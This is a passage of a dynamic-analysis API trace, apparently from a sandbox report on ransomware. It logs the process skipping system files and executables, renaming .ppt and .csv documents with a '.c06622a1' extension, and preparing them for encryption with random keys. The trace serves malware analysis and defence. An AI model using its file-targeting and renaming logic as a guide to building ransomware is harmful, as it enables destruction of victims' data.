[0149.368] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0149.368] wcslen (_String="cab") returned 0x3 [0149.368] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0149.368] wcslen (_String="cmd") returned 0x3 [0149.368] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0149.368] wcslen (_String="com") returned 0x3 [0149.368] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0149.368] wcslen (_String="cpl") returned 0x3 [0149.368] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0149.368] wcslen (_String="cur") returned 0x3 [0149.368] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0149.368] wcslen (_String="deskthemepack") returned 0xd [0149.368] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0149.368] wcslen (_String="diagcab") returned 0x7 [0149.368] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0149.368] wcslen (_String="diagcfg") returned 0x7 [0149.368] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0149.368] wcslen (_String="diagpkg") returned 0x7 [0149.368] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0149.368] wcslen (_String="dll") returned 0x3 [0149.368] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0149.368] wcslen (_String="drv") returned 0x3 [0149.368] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0149.368] wcslen (_String="exe") returned 0x3 [0149.368] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0149.368] wcslen (_String="hlp") returned 0x3 [0149.368] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0149.368] wcslen (_String="icl") returned 0x3 [0149.368] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0149.368] wcslen (_String="icns") returned 0x4 [0149.368] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0149.369] wcslen (_String="ico") returned 0x3 [0149.369] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0149.369] wcslen (_String="ics") returned 0x3 [0149.369] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0149.369] wcslen (_String="idx") returned 0x3 [0149.369] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0149.369] wcslen (_String="ldf") returned 0x3 [0149.369] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0149.369] wcslen (_String="lnk") returned 0x3 [0149.369] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0149.369] wcslen (_String="mod") returned 0x3 [0149.369] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0149.369] wcslen (_String="mpa") returned 0x3 [0149.369] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0149.369] wcslen (_String="msc") returned 0x3 [0149.369] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0149.369] wcslen (_String="msp") returned 0x3 [0149.370] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0149.370] wcslen (_String="msstyles") returned 0x8 [0149.370] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0149.370] wcslen (_String="msu") returned 0x3 [0149.370] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0149.370] wcslen (_String="nls") returned 0x3 [0149.370] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0149.370] wcslen (_String="nomedia") returned 0x7 [0149.370] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0149.370] wcslen (_String="ocx") returned 0x3 [0149.370] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0149.370] wcslen (_String="prf") returned 0x3 [0149.370] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0149.370] wcslen (_String="ps1") returned 0x3 [0149.370] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0149.370] wcslen (_String="rom") returned 0x3 [0149.370] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0149.370] wcslen (_String="rtp") returned 0x3 [0149.370] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0149.370] wcslen (_String="scr") returned 0x3 [0149.370] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0149.370] wcslen (_String="shs") returned 0x3 [0149.370] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0149.371] wcslen (_String="spl") returned 0x3 [0149.371] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0149.371] wcslen (_String="sys") returned 0x3 [0149.371] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0149.371] wcslen (_String="theme") returned 0x5 [0149.371] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0149.371] wcslen (_String="themepack") returned 0x9 [0149.371] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0149.371] wcslen (_String="wpx") returned 0x3 [0149.371] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0149.371] wcslen (_String="lock") returned 0x4 [0149.371] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0149.371] wcslen (_String="key") returned 0x3 [0149.371] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0149.371] wcslen (_String="hta") returned 0x3 [0149.371] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0149.371] wcslen (_String="msi") returned 0x3 [0149.371] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0149.371] wcslen (_String="pdb") returned 0x3 [0149.371] _wcsicmp (_Str1="sql", _Str2="ppt") returned 3 [0149.371] wcslen (_String="sql") returned 0x3 [0149.371] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0149.371] wcslen (_String="sqlite") returned 0x6 [0149.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1")) returned 0x10 [0149.372] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.372] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" [0149.372] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned 0x44 [0149.372] wcscpy (in: _Dest=0x4530132, _Source="FwQBsWg0DRr9fAA.ppt" | out: _Dest="FwQBsWg0DRr9fAA.ppt") returned="FwQBsWg0DRr9fAA.ppt" [0149.372] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt", dwFileAttributes=0x80) returned 1 [0149.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\fwqbswg0drr9faa.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0149.372] SetFilePointerEx (in: hFile=0x660, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.372] ReadFile (in: hFile=0x660, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.373] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x323ea58f [0149.373] RtlComputeCrc32 (PartialCrc=0xa58f, Buffer=0x3fe674, Length=0x80) returned 0xb182056c [0149.373] RtlComputeCrc32 (PartialCrc=0x56c, Buffer=0x3fe674, Length=0x80) returned 0x1294b690 [0149.373] RtlComputeCrc32 (PartialCrc=0xb690, Buffer=0x3fe674, Length=0x80) returned 0xec87f1b0 [0149.373] RtlComputeCrc32 (PartialCrc=0xf1b0, Buffer=0x3fe674, Length=0x80) returned 0xb29107bb [0149.373] CloseHandle (hObject=0x660) returned 1 [0149.373] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.373] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt" [0149.373] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt") returned 0x58 [0149.373] wcscpy (in: _Dest=0x4540160, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.373] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\fwqbswg0drr9faa.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\fwqbswg0drr9faa.ppt.c06622a1"), dwFlags=0x8) returned 1 [0149.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\FwQBsWg0DRr9fAA.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\fwqbswg0drr9faa.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x660 [0149.389] CreateIoCompletionPort (FileHandle=0x660, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.389] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4c10020 [0149.394] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2d438fd0 [0149.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f496a1 [0149.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7324c131 [0149.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ed0f547 [0149.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e7eba9c [0149.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x478b67b7 [0149.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x52e40596 [0149.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd9d1e2f [0149.398] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4c10094, Length=0x80) returned 0x964a950c [0149.398] RtlComputeCrc32 (PartialCrc=0x950c, Buffer=0x4c10094, Length=0x80) returned 0xcfe76ff9 [0149.398] RtlComputeCrc32 (PartialCrc=0x6ff9, Buffer=0x4c10094, Length=0x80) returned 0x30d25996 [0149.398] RtlComputeCrc32 (PartialCrc=0x5996, Buffer=0x4c10094, Length=0x80) returned 0x95add2f3 [0149.398] RtlComputeCrc32 (PartialCrc=0xd2f3, Buffer=0x4c10094, Length=0x80) returned 0x787ded4d [0149.398] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0149.398] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.398] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.398] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1927e0, ftCreationTime.dwHighDateTime=0x1d5da7b, ftLastAccessTime.dwLowDateTime=0xd9b1cdd0, ftLastAccessTime.dwHighDateTime=0x1d5e1e0, ftLastWriteTime.dwLowDateTime=0xd9b1cdd0, ftLastWriteTime.dwHighDateTime=0x1d5e1e0, nFileSizeHigh=0x0, nFileSizeLow=0x15345, dwReserved0=0x0, dwReserved1=0x0, cFileName="juBLep8EtZP.csv", cAlternateFileName="JUBLEP~1.CSV")) returned 1 [0149.398] _wcsicmp (_Str1="juBLep8EtZP.csv", _Str2="README.c06622a1.TXT") returned -8 [0149.398] wcsstr (_Str="juBLep8EtZP.csv", _SubStr="README") returned 0x0 [0149.398] _wcsicmp (_Str1="autorun.inf", _Str2="juBLep8EtZP.csv") returned -9 [0149.398] wcslen (_String="autorun.inf") returned 0xb [0149.398] _wcsicmp (_Str1="boot.ini", _Str2="juBLep8EtZP.csv") returned -8 [0149.398] wcslen (_String="boot.ini") returned 0x8 [0149.398] _wcsicmp (_Str1="bootfont.bin", _Str2="juBLep8EtZP.csv") returned -8 [0149.398] wcslen (_String="bootfont.bin") returned 0xc [0149.398] _wcsicmp (_Str1="bootsect.bak", _Str2="juBLep8EtZP.csv") returned -8 [0149.399] wcslen (_String="bootsect.bak") returned 0xc [0149.399] _wcsicmp (_Str1="desktop.ini", _Str2="juBLep8EtZP.csv") returned -6 [0149.399] wcslen (_String="desktop.ini") returned 0xb [0149.399] _wcsicmp (_Str1="iconcache.db", _Str2="juBLep8EtZP.csv") returned -1 [0149.399] wcslen (_String="iconcache.db") returned 0xc [0149.399] _wcsicmp (_Str1="ntldr", _Str2="juBLep8EtZP.csv") returned 4 [0149.399] wcslen (_String="ntldr") returned 0x5 [0149.399] _wcsicmp (_Str1="ntuser.dat", _Str2="juBLep8EtZP.csv") returned 4 [0149.399] wcslen (_String="ntuser.dat") returned 0xa [0149.399] _wcsicmp (_Str1="ntuser.dat.log", _Str2="juBLep8EtZP.csv") returned 4 [0149.399] wcslen (_String="ntuser.dat.log") returned 0xe [0149.399] _wcsicmp (_Str1="ntuser.ini", _Str2="juBLep8EtZP.csv") returned 4 [0149.399] wcslen (_String="ntuser.ini") returned 0xa [0149.399] _wcsicmp (_Str1="thumbs.db", _Str2="juBLep8EtZP.csv") returned 10 [0149.399] wcslen (_String="thumbs.db") returned 0x9 [0149.399] _wcsicmp (_Str1="386", _Str2="csv") returned -48 [0149.399] wcslen (_String="386") returned 0x3 [0149.399] _wcsicmp (_Str1="adv", _Str2="csv") returned -2 [0149.399] wcslen (_String="adv") returned 0x3 [0149.399] _wcsicmp (_Str1="ani", _Str2="csv") returned -2 [0149.399] wcslen (_String="ani") returned 0x3 [0149.399] _wcsicmp (_Str1="bat", _Str2="csv") returned -1 [0149.399] wcslen (_String="bat") returned 0x3 [0149.399] _wcsicmp (_Str1="bin", _Str2="csv") returned -1 [0149.399] wcslen (_String="bin") returned 0x3 [0149.399] _wcsicmp (_Str1="cab", _Str2="csv") returned -18 [0149.399] wcslen (_String="cab") returned 0x3 [0149.399] _wcsicmp (_Str1="cmd", _Str2="csv") returned -6 [0149.399] wcslen (_String="cmd") returned 0x3 [0149.399] _wcsicmp (_Str1="com", _Str2="csv") returned -4 [0149.400] wcslen (_String="com") returned 0x3 [0149.400] _wcsicmp (_Str1="cpl", _Str2="csv") returned -3 [0149.400] wcslen (_String="cpl") returned 0x3 [0149.400] _wcsicmp (_Str1="cur", _Str2="csv") returned 2 [0149.400] wcslen (_String="cur") returned 0x3 [0149.400] _wcsicmp (_Str1="deskthemepack", _Str2="csv") returned 1 [0149.400] wcslen (_String="deskthemepack") returned 0xd [0149.400] _wcsicmp (_Str1="diagcab", _Str2="csv") returned 1 [0149.400] wcslen (_String="diagcab") returned 0x7 [0149.400] _wcsicmp (_Str1="diagcfg", _Str2="csv") returned 1 [0149.400] wcslen (_String="diagcfg") returned 0x7 [0149.400] _wcsicmp (_Str1="diagpkg", _Str2="csv") returned 1 [0149.400] wcslen (_String="diagpkg") returned 0x7 [0149.400] _wcsicmp (_Str1="dll", _Str2="csv") returned 1 [0149.400] wcslen (_String="dll") returned 0x3 [0149.400] _wcsicmp (_Str1="drv", _Str2="csv") returned 1 [0149.400] wcslen (_String="drv") returned 0x3 [0149.400] _wcsicmp (_Str1="exe", _Str2="csv") returned 2 [0149.400] wcslen (_String="exe") returned 0x3 [0149.401] _wcsicmp (_Str1="hlp", _Str2="csv") returned 5 [0149.401] wcslen (_String="hlp") returned 0x3 [0149.401] _wcsicmp (_Str1="icl", _Str2="csv") returned 6 [0149.401] wcslen (_String="icl") returned 0x3 [0149.401] _wcsicmp (_Str1="icns", _Str2="csv") returned 6 [0149.401] wcslen (_String="icns") returned 0x4 [0149.401] _wcsicmp (_Str1="ico", _Str2="csv") returned 6 [0149.401] wcslen (_String="ico") returned 0x3 [0149.401] _wcsicmp (_Str1="ics", _Str2="csv") returned 6 [0149.401] wcslen (_String="ics") returned 0x3 [0149.401] _wcsicmp (_Str1="idx", _Str2="csv") returned 6 [0149.401] wcslen (_String="idx") returned 0x3 [0149.401] _wcsicmp (_Str1="ldf", _Str2="csv") returned 9 [0149.401] wcslen (_String="ldf") returned 0x3 [0149.401] _wcsicmp (_Str1="lnk", _Str2="csv") returned 9 [0149.401] wcslen (_String="lnk") returned 0x3 [0149.401] _wcsicmp (_Str1="mod", _Str2="csv") returned 10 [0149.401] wcslen (_String="mod") returned 0x3 [0149.401] _wcsicmp (_Str1="mpa", _Str2="csv") returned 10 [0149.401] wcslen (_String="mpa") returned 0x3 [0149.401] _wcsicmp (_Str1="msc", _Str2="csv") returned 10 [0149.401] wcslen (_String="msc") returned 0x3 [0149.401] _wcsicmp (_Str1="msp", _Str2="csv") returned 10 [0149.401] wcslen (_String="msp") returned 0x3 [0149.401] _wcsicmp (_Str1="msstyles", _Str2="csv") returned 10 [0149.401] wcslen (_String="msstyles") returned 0x8 [0149.401] _wcsicmp (_Str1="msu", _Str2="csv") returned 10 [0149.401] wcslen (_String="msu") returned 0x3 [0149.401] _wcsicmp (_Str1="nls", _Str2="csv") returned 11 [0149.401] wcslen (_String="nls") returned 0x3 [0149.401] _wcsicmp (_Str1="nomedia", _Str2="csv") returned 11 [0149.402] wcslen (_String="nomedia") returned 0x7 [0149.402] _wcsicmp (_Str1="ocx", _Str2="csv") returned 12 [0149.402] wcslen (_String="ocx") returned 0x3 [0149.402] _wcsicmp (_Str1="prf", _Str2="csv") returned 13 [0149.402] wcslen (_String="prf") returned 0x3 [0149.402] _wcsicmp (_Str1="ps1", _Str2="csv") returned 13 [0149.402] wcslen (_String="ps1") returned 0x3 [0149.402] _wcsicmp (_Str1="rom", _Str2="csv") returned 15 [0149.402] wcslen (_String="rom") returned 0x3 [0149.402] _wcsicmp (_Str1="rtp", _Str2="csv") returned 15 [0149.402] wcslen (_String="rtp") returned 0x3 [0149.402] _wcsicmp (_Str1="scr", _Str2="csv") returned 16 [0149.402] wcslen (_String="scr") returned 0x3 [0149.402] _wcsicmp (_Str1="shs", _Str2="csv") returned 16 [0149.402] wcslen (_String="shs") returned 0x3 [0149.402] _wcsicmp (_Str1="spl", _Str2="csv") returned 16 [0149.402] wcslen (_String="spl") returned 0x3 [0149.402] _wcsicmp (_Str1="sys", _Str2="csv") returned 16 [0149.402] wcslen (_String="sys") returned 0x3 [0149.402] _wcsicmp (_Str1="theme", _Str2="csv") returned 17 [0149.402] wcslen (_String="theme") returned 0x5 [0149.402] _wcsicmp (_Str1="themepack", _Str2="csv") returned 17 [0149.402] wcslen (_String="themepack") returned 0x9 [0149.402] _wcsicmp (_Str1="wpx", _Str2="csv") returned 20 [0149.402] wcslen (_String="wpx") returned 0x3 [0149.402] _wcsicmp (_Str1="lock", _Str2="csv") returned 9 [0149.402] wcslen (_String="lock") returned 0x4 [0149.402] _wcsicmp (_Str1="key", _Str2="csv") returned 8 [0149.402] wcslen (_String="key") returned 0x3 [0149.402] _wcsicmp (_Str1="hta", _Str2="csv") returned 5 [0149.402] wcslen (_String="hta") returned 0x3 [0149.403] _wcsicmp (_Str1="msi", _Str2="csv") returned 10 [0149.403] wcslen (_String="msi") returned 0x3 [0149.403] _wcsicmp (_Str1="pdb", _Str2="csv") returned 13 [0149.403] wcslen (_String="pdb") returned 0x3 [0149.403] _wcsicmp (_Str1="sql", _Str2="csv") returned 16 [0149.403] wcslen (_String="sql") returned 0x3 [0149.403] _wcsicmp (_Str1="sqlite", _Str2="csv") returned 16 [0149.403] wcslen (_String="sqlite") returned 0x6 [0149.403] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1")) returned 0x10 [0149.403] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.403] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" [0149.403] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned 0x44 [0149.403] wcscpy (in: _Dest=0x4530132, _Source="juBLep8EtZP.csv" | out: _Dest="juBLep8EtZP.csv") returned="juBLep8EtZP.csv" [0149.403] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv", dwFileAttributes=0x80) returned 1 [0149.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\jublep8etzp.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0149.404] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.404] ReadFile (in: hFile=0x134, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.405] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x48618240 [0149.405] RtlComputeCrc32 (PartialCrc=0x8240, Buffer=0x3fe674, Length=0x80) returned 0x4aedac2 [0149.405] RtlComputeCrc32 (PartialCrc=0xdac2, Buffer=0x3fe674, Length=0x80) returned 0x971ed122 [0149.405] RtlComputeCrc32 (PartialCrc=0xd122, Buffer=0x3fe674, Length=0x80) returned 0xa30d7e84 [0149.405] RtlComputeCrc32 (PartialCrc=0x7e84, Buffer=0x3fe674, Length=0x80) returned 0xfd704335 [0149.405] CloseHandle (hObject=0x134) returned 1 [0149.405] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.405] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv" [0149.405] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv") returned 0x54 [0149.405] wcscpy (in: _Dest=0x4540158, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.405] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\jublep8etzp.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\jublep8etzp.csv.c06622a1"), dwFlags=0x8) returned 1 [0149.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\juBLep8EtZP.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\jublep8etzp.csv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0149.409] CreateIoCompletionPort (FileHandle=0x134, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.409] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ca0020 [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54441515 [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46e2f972 [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x309c49c9 [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa8ffeab [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4bc39948 [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6689c86b [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xae92ef7 [0149.415] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53964d32 [0149.418] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ca0094, Length=0x80) returned 0x12d1c09e [0149.419] RtlComputeCrc32 (PartialCrc=0xc09e, Buffer=0x4ca0094, Length=0x80) returned 0xd85606d9 [0149.419] RtlComputeCrc32 (PartialCrc=0x6d9, Buffer=0x4ca0094, Length=0x80) returned 0x5b491187 [0149.419] RtlComputeCrc32 (PartialCrc=0x1187, Buffer=0x4ca0094, Length=0x80) returned 0x31867dc0 [0149.419] RtlComputeCrc32 (PartialCrc=0x7dc0, Buffer=0x4ca0094, Length=0x80) returned 0x26635980 [0149.419] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0149.419] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.419] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.419] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: 